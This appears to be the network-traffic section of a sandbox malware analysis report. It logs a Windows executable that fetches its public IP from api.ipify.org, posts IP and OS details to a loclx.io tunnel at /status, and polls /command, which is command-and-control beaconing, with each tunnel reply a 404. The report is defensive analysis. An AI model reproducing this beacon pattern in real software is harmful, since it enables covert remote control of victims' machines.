              Dec 11, 2024 11:30:50.358905077 CET4995080192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:50.360191107 CET4995680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:50.478899956 CET8049950167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:50.479671001 CET8049956167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:50.479878902 CET4995680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:50.480128050 CET4995680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:50.599428892 CET8049956167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:51.724663973 CET8049956167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:51.724770069 CET8049956167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:51.724811077 CET4995680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:51.724884987 CET8049956167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:51.724945068 CET4995680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:51.725195885 CET4995680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:51.844641924 CET8049956167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:56.738239050 CET4997180192.168.2.5104.26.12.205
              Dec 11, 2024 11:30:56.857633114 CET8049971104.26.12.205192.168.2.5
              Dec 11, 2024 11:30:56.857825041 CET4997180192.168.2.5104.26.12.205
              Dec 11, 2024 11:30:56.858113050 CET4997180192.168.2.5104.26.12.205
              Dec 11, 2024 11:30:56.977488041 CET8049971104.26.12.205192.168.2.5
              Dec 11, 2024 11:30:57.964129925 CET8049971104.26.12.205192.168.2.5
              Dec 11, 2024 11:30:57.964431047 CET8049971104.26.12.205192.168.2.5
              Dec 11, 2024 11:30:57.964492083 CET4997180192.168.2.5104.26.12.205
              Dec 11, 2024 11:30:57.964533091 CET4997180192.168.2.5104.26.12.205
              Dec 11, 2024 11:30:57.965572119 CET4997680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:58.084150076 CET8049971104.26.12.205192.168.2.5
              Dec 11, 2024 11:30:58.085057020 CET8049976167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:58.085166931 CET4997680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:58.096885920 CET4997680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:58.216218948 CET8049976167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:58.216407061 CET4997680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:58.335756063 CET8049976167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:59.324276924 CET8049976167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:59.324404001 CET8049976167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:59.324456930 CET8049976167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:59.324548006 CET4997680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:59.324569941 CET4997680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:59.324903011 CET4997680192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:59.326500893 CET4997880192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:59.444149971 CET8049976167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:59.445842028 CET8049978167.99.38.229192.168.2.5
              Dec 11, 2024 11:30:59.445946932 CET4997880192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:59.446290970 CET4997880192.168.2.5167.99.38.229
              Dec 11, 2024 11:30:59.565584898 CET8049978167.99.38.229192.168.2.5
              Dec 11, 2024 11:31:00.681830883 CET8049978167.99.38.229192.168.2.5
              Dec 11, 2024 11:31:00.681922913 CET8049978167.99.38.229192.168.2.5
              Dec 11, 2024 11:31:00.681940079 CET8049978167.99.38.229192.168.2.5
              Dec 11, 2024 11:31:00.682060957 CET4997880192.168.2.5167.99.38.229
              Dec 11, 2024 11:31:00.682358980 CET4997880192.168.2.5167.99.38.229
              Dec 11, 2024 11:31:00.801543951 CET8049978167.99.38.229192.168.2.5
              TimestampSource PortDest PortSource IPDest IP
              Dec 11, 2024 11:28:58.472573042 CET5569853192.168.2.51.1.1.1
              Dec 11, 2024 11:28:58.613585949 CET53556981.1.1.1192.168.2.5
              Dec 11, 2024 11:28:59.842607021 CET6185353192.168.2.51.1.1.1
              Dec 11, 2024 11:29:00.392656088 CET53618531.1.1.1192.168.2.5
              Dec 11, 2024 11:30:03.239178896 CET5201753192.168.2.51.1.1.1
              Dec 11, 2024 11:30:03.679965019 CET53520171.1.1.1192.168.2.5
              Dec 11, 2024 11:30:38.315912962 CET6217653192.168.2.51.1.1.1
              Dec 11, 2024 11:30:38.452795029 CET53621761.1.1.1192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Dec 11, 2024 11:28:58.472573042 CET192.168.2.51.1.1.10xd643Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
              Dec 11, 2024 11:28:59.842607021 CET192.168.2.51.1.1.10x1a71Standard query (0)pepwuecibr.eu.loclx.ioA (IP address)IN (0x0001)false
              Dec 11, 2024 11:30:03.239178896 CET192.168.2.51.1.1.10x62f4Standard query (0)pepwuecibr.eu.loclx.ioA (IP address)IN (0x0001)false
              Dec 11, 2024 11:30:38.315912962 CET192.168.2.51.1.1.10xae4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Dec 11, 2024 11:28:58.613585949 CET1.1.1.1192.168.2.50xd643No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
              Dec 11, 2024 11:28:58.613585949 CET1.1.1.1192.168.2.50xd643No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
              Dec 11, 2024 11:28:58.613585949 CET1.1.1.1192.168.2.50xd643No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
              Dec 11, 2024 11:29:00.392656088 CET1.1.1.1192.168.2.50x1a71No error (0)pepwuecibr.eu.loclx.ioeu.loclx.ioCNAME (Canonical name)IN (0x0001)false
              Dec 11, 2024 11:29:00.392656088 CET1.1.1.1192.168.2.50x1a71No error (0)eu.loclx.io167.99.38.229A (IP address)IN (0x0001)false
              Dec 11, 2024 11:30:03.679965019 CET1.1.1.1192.168.2.50x62f4No error (0)pepwuecibr.eu.loclx.ioeu.loclx.ioCNAME (Canonical name)IN (0x0001)false
              Dec 11, 2024 11:30:03.679965019 CET1.1.1.1192.168.2.50x62f4No error (0)eu.loclx.io167.99.38.229A (IP address)IN (0x0001)false
              Dec 11, 2024 11:30:38.452795029 CET1.1.1.1192.168.2.50xae4No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
              Dec 11, 2024 11:30:38.452795029 CET1.1.1.1192.168.2.50xae4No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
              Dec 11, 2024 11:30:38.452795029 CET1.1.1.1192.168.2.50xae4No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
              • api.ipify.org
              • pepwuecibr.eu.loclx.io
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.549704172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:28:58.776192904 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:28:59.841166019 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:28:59 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04ca80fe1d0cc2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.549705167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:00.612281084 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:29:00.735989094 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:29:01.844504118 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:01.844525099 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.549706167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:01.987719059 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:29:03.231303930 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:03.231328011 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.549707172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:08.347069979 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:29:09.444174051 CET426INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:29:09 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cabcfc8b4229-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2302&min_rtt=2302&rtt_var=1151&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.549708167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:09.566456079 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:29:09.686248064 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:29:10.803586960 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:10.803620100 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.549709167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:10.940543890 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:29:12.177777052 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:12.177824020 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.549714172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:17.311166048 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:29:18.416271925 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:29:18 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04caf50904424c-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.549715167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:18.538021088 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:29:18.657406092 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:29:19.777371883 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:19.777470112 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.549722167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:19.898974895 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:29:21.139556885 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:21.139596939 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.549739172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:26.279794931 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:29:27.468954086 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:29:27 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cb2d1b9342e1-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1584&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.549740167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:27.589978933 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:29:27.713669062 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:29:28.824376106 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:28.824450016 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.549746167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:28.946234941 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:29:30.188648939 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:30.188750029 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.549762172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:35.314178944 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:29:36.414221048 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:29:36 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cb6589e50f8f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


